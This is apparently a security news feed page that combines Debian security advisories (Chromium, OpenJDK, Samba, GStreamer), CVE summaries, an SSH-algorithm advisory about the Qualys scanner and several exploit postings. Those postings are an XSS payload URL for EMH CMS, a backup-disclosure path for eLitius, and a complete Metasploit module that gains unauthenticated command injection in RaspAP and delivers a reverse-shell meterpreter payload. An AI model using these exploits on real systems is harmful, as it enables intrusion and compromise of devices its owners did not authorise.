Debian Linux Security Advisory 5479-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5479-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 17, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-2312 CVE-2023-4349 CVE-2023-4350 CVE-2023-4351  
                 CVE-2023-4352 CVE-2023-4353 CVE-2023-4354 CVE-2023-4355  
                 CVE-2023-4356 CVE-2023-4357 CVE-2023-4358 CVE-2023-4359  
                 CVE-2023-4360 CVE-2023-4361 CVE-2023-4362 CVE-2023-4363  
                 CVE-2023-4364 CVE-2023-4365 CVE-2023-4366 CVE-2023-4367  
                 CVE-2023-4368

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 116.0.5845.96-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 116.0.5845.96-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTecqYACgkQEMKTtsN8  
TjZtRhAAuk2RpKtwhNgTv0PRgzA31HSDvKQM3qRdCv42rXVByAjb+sZefppVKDm/  
wS75aMDtXrQeW743pZsPDWrZntt13Xg1z9ydXJJmkaZJC1ajlmX51RMvDURM6V7y  
BzbcV9K41M4qr9ZSEA5e8xgxB9nB679Ut78UgHvGNux2DmexiFSa8ktnkBklfQ5S  
6qjO8MpT+dAie/k5MGHZGYE4tTl6VJ+X6fimCCDs/WNWzzXeRBJKhxadSw3uQ+gc  
B3F/SxgWCHLQx25ROnsnY1+AVC9Wx4iCpaBgkXw+HhIKTaSie0/Q4MQfk3ke2rTQ  
I9WpJH93e18JwvPD4ZcoGLJ3znYYsYmMv0Sf1ykcDGK/Wk7m3IZUoWrYTnPcxhEz  
6ozXxdVM7Y5t15LCPPLdcjq8tN4Ubsnu+8w1eVJ0ZOuuPnQ6SyydC6ZLVrcQ8dt2  
OgZTmeSAWEl4wtaBOmfigEtj6RhqdfDTba+5rY9VjYqSEmjwOZQ1U+YCqTzJIyUH  
wPcOjq/dtGLTjbgvkMKntpkRvO4/wChd41MmuSPIh4wPxgfdzeqKXzGtSsOL8tzB  
b16G0UDTqiTO3kCkikJZyqiQIPJH+zTgrnx541egN8yyKpA0pjTRQLR/VzDR8hRP  
edkKKwzknuwMOTJiiUKWLPcJMr3jOyyjbhToHOyo92JB5VMvCJU=lmp7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5479-1

Debian Linux Security Advisory 5478-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in bypass of sandbox restrictions, information disclosure, reduced cryptographic strength of the AES implementation, directory traversal or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5478-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 16, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-11CVE ID         : CVE-2023-21930 CVE-2023-21937 CVE-2023-21938 CVE-2023-21939                 CVE-2023-21954 CVE-2023-21967 CVE-2023-21968 CVE-2023-22006                 CVE-2023-22036 CVE-2023-22041 CVE-2023-22045 CVE-2023-22049Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in bypass of sandbox restrictions, informationdisclosure, reduced cryptographic strength of the AES implementation,directory traversal or denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 11.0.20+8-1~deb11u1.We recommend that you upgrade your openjdk-11 packages.For the detailed security status of openjdk-11 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-11Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTdEtEACgkQEMKTtsN8Tja/nQ//eX9gCDOYqnUCQstcYptYuXgyES5gFeaKVA/cN/isdWaiDIjD0kTiwYQKGzck9y5gobZpTc6oqOLb7aaMXqo2NhhJF/G7SNuc0zeo6hQF6pwxvdBz3GA2BAQCrc2xEHoxAekd2uZq2Oo9UG48V+2M5eB8sBc4f0FuTk2UQby3cwCIvAp3X/QsBrLgkKp3H34fxwFb8YXtA5MgaEn+qzBa3XWd6MeN5qyEIHtJ+np5htr6xFjQxUNPnwHei0e67Jvvo0uIb3nwKPyuEPDZvG4FYWN6IKrbuS8b9/RWcSxkgXZbZsJ/8Ipa9dTV1/B0/qvICq3Zt6Wq1HX5KNJRq/zfvx/RhA59dSpYnP/pE4qsQ8MNgNd2LWaixgu4p2JPc+OpSZOkeZyygdf/oDuNj9dkllVu62ygwVxsmQRqMtZkOB7cnPHHBTMG+ArnV4lmfweWO9TEMzMOf6H91G84zwfbgiHoymdAdGfJHhZt2wh+xAvrQCsRdHRk1BX6NSXq4nQp2Wlkdr6w763C0LU6F9AqwF06GesQmOhbt0ZCD7e5CwT4umm19F/gDhHPeoUQ0CU6tF03WurwYuR/RKcYqISZIPRj5ORIDLYrGJIVCBm9phhmliyVSplf1Jx5jTcZTlHy9NpauQcSpc7kXmUg6SNYYYOxQHnfIHyz+dHqh5jgz1A=wEyu-----END PGP SIGNATURE-----

Debian Security Advisory 5478-1

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

**EMH CMS 0.1 Cross Site Scripting**

Posted Aug 16, 2023

Authored by indoushka

EMH CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | c58615aff6cd57a5ca22a34be62372e9e81249eb20b812f9a35ccd440af33052

Download | Favorite | View

**EMH CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : EMH CMS v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(64-bit)                                             | | # Vendor    : http://www.theemhglobal.com/                                                                                       |  | # Dork      : Designed by EMH TheEmhGlobal                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/freedomcentreinternationalorg/icoms/news_detail.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,973)
*   Arbitrary (16,202)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,280)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,437)
*   Encryption (2,370)
*   Exploit (51,900)
*   File Inclusion (4,222)
*   File Upload (974)
*   Firewall (821)
*   Info Disclosure (2,775)
*   Intrusion Detection (892)
*   Java (3,044)
*   JavaScript (859)
*   Kernel (6,674)
*   Local (14,453)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,777)
*   Root (3,584)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,373)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,778)
*   Web (9,668)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,944)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,470)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,734)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,822)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,573)
*   Other

EMH CMS 0.1 Cross Site Scripting

DVWA v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at blind\source\high.php.

CVE-2023-39848: GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)

RaspAP is feature-rich wireless router software that just works on many popular Debian-based devices, including the Raspberry Pi. A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. Successfully tested against RaspAP 2.8.0 and 2.8.7.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'RaspAP Unauthenticated Command Injection',        'Description' => %q{          RaspAP is feature-rich wireless router software that just works          on many popular Debian-based devices, including the Raspberry Pi.          A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows          unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.          Successfully tested against RaspAP 2.8.0 and 2.8.7.        },        'License' => MSF_LICENSE,        'Author' => [          'Ege BALCI <egebalci[at]pm.me>', # msf module          'Ismael0x00', # original PoC, analysis        ],        'References' => [          ['CVE', '2022-39986'],          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']        ],        'Platform' => ['unix', 'linux'],        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DisclosureDate' => '2023-07-31',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => []        }      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST'    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    if res.code == 200      return CheckCode::Appears    end    CheckCode::Safe  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),      'method' => 'POST',      'vars_post' => {        'cfg_id' => ";#{cmd};#"      }    )  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend

RaspAP 2.8.7 Unauthenticated Command Injection

Debian Linux Security Advisory 5477-1 - Several vulnerabilities have been discovered in Samba, which could result in information disclosure, denial of service or insufficient enforcement of security-relevant config directives.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5477-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 14, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : samba  
CVE ID         : CVE-2022-2127 CVE-2023-3347 CVE-2023-34966 CVE-2023-34967   
                 CVE-2023-34968  
Debian Bug     : 1041043

Several vulnerabilities have been discovered in Samba, which could result  
in information disclosure, denial of service or insufficient enforcement  
of security-relevant config directives.

The version of Samba in the oldstable distribution (bullseye) cannot be  
fully supported further: If you are using Samba as a domain controller  
you should either upgrade to the stable distribution or if that's not  
an immediate option consider to migrate to Samba from bullseye-backports  
(which will be kept updated to the version in stable). Operating Samba  
as a file/print server will continue to be supported, a separate DSA  
will provide an update update along with documentation about the scope  
of continued support.

For the stable distribution (bookworm), these problems have been fixed in  
version 2:4.17.10+dfsg-0+deb12u1.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTadJsACgkQEMKTtsN8  
TjamWhAAr1DOVp9DBJATMyIq2Dqcv9O6x4ipPU/NE0oLG95m9b2kTgakUuj+wQLP  
mVfbVi1n9IuRDWW16BH4b63gEx2Yvul4jDBJr42WzawBJVdnQhvNCUavmWgsdCiJ  
jc8+bSAiYYN0p076G1AoIastRPoXGjX1tQ/b1iFHG8tC9qX6qCdJy7GFlPClQqYs  
K0DdLLj1iz872rlL14zi4znHz3Gsf8d+TNmMVfMqG3aswHiYbrKd954c3/zv51zC  
DSm85I6YSgi4+4oCLqJbjlfCFFV+68U5PW86XhPSjHBA6//cvFtIdxVjqisQtV6T  
q+kPIMybAkdmG8Z+XLaPIOsBty957XMIYp0S84wTIX/MhlQ+Z6Jns5bU6yQJYN78  
ZUqamCFGMEIPO7srQDUWEG77wOJ1Jvlj70sV7Zaz9XJkGlZamJsHMBE5rlg0glKr  
gogApnCbiQgKwJcbYxjdM2CKPg8329J0Mt9HqQFxBQC0Ig005+7B+zZUMMpRdQni  
HLRgZ4deBWAP3dowt/wSfcNgqOg2SyCKPm4nSllhkesXcJwUGPAktoRNhorxMqiN  
dmOAvfYZu+HaPYKVnsdfsjUlI0Z0n+QTsaen48cAYNClNeLQySW3zpEkSqWkNJ/S  
YCPU6KabOxeXFjl2LVUTy0FHdO4fnqZJo/egS0ydgkv0t8Iwja4=  
=Roie  
-----END PGP SIGNATURE-----

Debian Security Advisory 5477-1

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

**eLitius 1.0 Backup Disclosure**

Posted Aug 15, 2023

Authored by indoushka

eLitius version 1.0 appears to leave backups in a world accessible directory under the document root.

tags | exploit, root, info disclosure

SHA-256 | 37a6ad9ab40e37e23d7cbfe01ee9334c417b3339776c4691b7ae872e89ddb896

Download | Favorite | View

**eLitius 1.0 Backup Disclosure**

    ====================================================================================================================================| # Title     : eLitius v1.0 Backup Disclosure Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://elitius.com/download/eLitius_v_1_0.tar.gz                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use payload : /backup/[+] http://wingro/cmim/backup/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,960)
*   Arbitrary (16,198)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,345)
*   DoS (23,432)
*   Encryption (2,370)
*   Exploit (51,887)
*   File Inclusion (4,222)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,773)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,674)
*   Local (14,452)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,773)
*   Root (3,582)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,887)
*   Shell (3,181)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,372)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,775)
*   Web (9,664)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,938)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,815)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,457)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,727)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,816)
*   UNIX (9,290)
*   UnixWare (186)
*   Windows (6,573)
*   Other

eLitius 1.0 Backup Disclosure

Debian Linux Security Advisory 5476-1 - Multiple vulnerabilities were discovered in the RealMedia demuxers for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5476-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 12, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-ugly1.0CVE ID         : not yet availableMultiple vulnerabilities were discovered in the RealMedia demuxers forthe GStreamer media framework, which may result in denial of service orpotentially the execution of arbitrary code if a malformed media fileis opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-2+deb12u1.We recommend that you upgrade your gst-plugins-ugly1.0 packages.For the detailed security status of gst-plugins-ugly1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-ugly1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTX2D0ACgkQEMKTtsN8TjbwIg//RuPTY1bmSNq9PRwNGDaunfEvlVTVsl+BCQmCkdyOOjyrc+87nDqdl2vD4v4QMYO1mNgf+uBI5cGi6qMTgwLqz5OP1m4ayIZmuLh70jx8T9igt7tr98O86zd5T5nBK++juQoZ0+1RG9YR8hATrtrZwETYWVHlSro0JMmcfvxw1gn/yT2gqEaT6N7k0rcUPWXh7H9H2ef7m6saewIQ0Qyvrnz9PULGnX8bJ0q1H7WWpsnCpBIXQFKpc6GlVKovdTkLnxHOqTygNkCv1PYFktv8TbtMhMzvrbsB1lFh1oM5DF6K7KtpyY8uHJsafMdKBY0nmtnyOxfMsmSJ8B/pG/hC+/xpvkiapfFsL2wNQqXbyK/PaCip0kgcWrAejxJb+yGXIk5PeQK+mUuv/gRQOl+SlN6XeB4O/F22iGgOs1x7alhhd8wmnVkmn8iBfNr7thYgX7k1RJju5TqiCSuWg4okbOwyrLMAhlloN/hERx+wu2FNxbTHk9h+cdtMpHMq66Fyd6u8eIhqFyvpcCRaaRhgZKTXOXGB9snvQGYYmKfCd6hOsXzqUwFIT5dGKxbKPOM33W8p3LkzUFXIQqn06v1+O9kRPxca+fTureibTsws7Xy/UKhVBulAuAfCfY9GN2BhtKpBPVdR09upElAAvEU0l/O5Ly36lYc4tdVtsg2PLd8=Bu6f-----END PGP SIGNATURE-----

Debian Security Advisory 5476-1

xterm before 380 supports ReGIS reporting for character-set names even if they have unexpected characters (i.e., neither alphanumeric nor underscore), aka a pointer/overflow issue.

CVE-2023-40359: XTERM - Change Log

Qualys scanners use the ssh-rsa algorithm for pubkey signing in its attempt of SSH login. Modern SSHD servers reject pubkey login with ssh-rsa, so Qualys is unable to scan up-to-date Linux e.g. Debian12 or RHEL9. Qualys does not check the list of pubkey signing algorithms accepted by SSHD servers, and therefore cannot notify about any insecure ones.

=== Introduction ===================================================

My institution uses Qualys

  www.qualys.com

to scan for vulnerabilities, including on some Debian Linux machines  
that I manage. The scanner does some network scans, and also logs in  
to each machine to do "authenticated scans".

=== Discovery ======================================================

When I recently updated my machines from Debian11 to Debian12, the  
Qualys scanner was no longer able to SSH login, with syslog lines:

  sshd: userauth_pubkey: signature algorithm ssh-rsa not in PubkeyAcceptedAlgorithms [preauth]

The ssh-rsa algorithm was removed from the default list in Debian12  
(has OpenSSH 9.2, up from 8.4 in Debian11), see e.g.

  www.openssh.com/txt/release-8.8  
    ... disables RSA signatures using the SHA-1 hash algorithm by  
    default. This change has been made as the SHA-1 hash algorithm  
    is cryptographically broken ...

I confirmed that Qualys uses (requires) ssh-rsa as public key signing  
algorithm: its SSH login to Debian12 suceeds with the SSHD setting  
"PubkeyAcceptedAlgorithms +ssh-rsa", and to Debian11 fails with the  
opposite "PubkeyAcceptedKeyTypes -ssh-rsa".

=== Issues =========================================================

 - Qualys scanner uses insecure ssh-rsa algorithm for pubkey signing  
   in its attempt of SSH login.

 - Modern SSHD servers reject pubkey login with ssh-rsa, so Qualys is  
   unable to scan up-to-date Linux e.g. Debian12 or RHEL9.

 - Qualys does not check the list of pubkey signing algorithms  
   accepted by SSHD servers, cannot notify about any insecure ones.

=== Vulnerability ==================================================

Any SSHD server that accepts the insecure ssh-rsa algorithm for pubkey  
signing is vulnerable. The fact that Qualys had been able to log in to  
all Linux machines at my institution, shows that all accept ssh-rsa  
and are vulnerable. It is expected that anywhere that Qualys is used,  
all Linux machines (except recently updated) are similarly vulnerable.

The vulnerability affects all uses of public key authentication.  
Qualys itself facilitates an internal attack, by providing the account  
used to do "authenticated scans", forced onto all machines and with  
root (sudo) access, with the public key commonly available to any  
local admins of any scanned machines. An attack on this account is  
both easier and more fruitful; admittedly an attack may be impractical  
with currently available computing resources.

=== Fixes needed ===================================================

 - Qualys to reconfigure the scanner to use a secure pubkey signing  
   algorithm for its SSH login attempt. This same fix also enables  
   Qualys to scan up-to-date Linux e.g. Debian12 or RHEL9.

 - Qualys to check the pubkey signing algorithms accepted by SSHD  
   servers, and notify when insecure ones are in use.

 - Administrators of Linux machines to check SSHD settings, ensure  
   that ssh-rsa is not accepted. This is needed on all SSHD servers,  
   regardless of whether Qualys is used.

=== Comments =======================================================

It is curious how Qualys:  
 - uses (requires!) an insecure pubkey signing algorithm, though  
   better alternatives have been the norm for decades;  
 - did not notice its inability to do authenticated scans on RHEL9  
   and similar machines, since over a year ago;  
 - checks many similar (similarly impractical) SSHD issues, but does  
   not check pubkey signing; and  
 - seems to know all about SSH, reporting esoteric issues in its  
   internals, but still uses it wrongly.

=== Dedication =====================================================

I dedicate this advisory to Luis Fuentes-Cobas, my one-time professor  
of Electromagnetism, who taught me logic, deduction and persistence.  
Maybe I missed the class about patience.

=== References =====================================================

www.qualys.com/  
www.qualys.com/docs/qualys-authenticated-scanning-unix.pdf  
www.openssh.com/txt/release-8.2  
www.openssh.com/txt/release-8.8  
https://eprint.iacr.org/2020/014.pdf  
www.usenix.org/conference/usenixsecurity20/presentation/leurent  
https://csrc.nist.gov/news/2006/nist-comments-on-cryptanalytic-attacks-on-sha-1  
https://csrc.nist.gov/Projects/hash-functions/nist-policy-on-hash-functions  
https://en.wikipedia.org/wiki/SHA-1  
www.rfc-editor.org/rfc/rfc4252.html  
https://success.qualys.com/support/s/article/000003219  
https://success.qualys.com/support/s/article/000006407  
https://seclists.org/fulldisclosure/2016/Jan/44  
https://seclists.org/oss-sec/2023/q1/75  
https://seclists.org/fulldisclosure/2023/Jul/31

=== Timeline =======================================================

24 June 2023  Discovered, notified internally within my institution  
 9 July 2023  Qualys contacted via "community" post  
16 July 2023  Qualys contacted via security@qualys.com  
26 July 2023  CVE requested from bugreport@qualys.com (a CNA partner)

====================================================================

--   
Paul Szabo       psz@maths.usyd.edu.au       www.maths.usyd.edu.au/u/psz  
School of Mathematics and Statistics   University of Sydney    Australia

Tag

#debian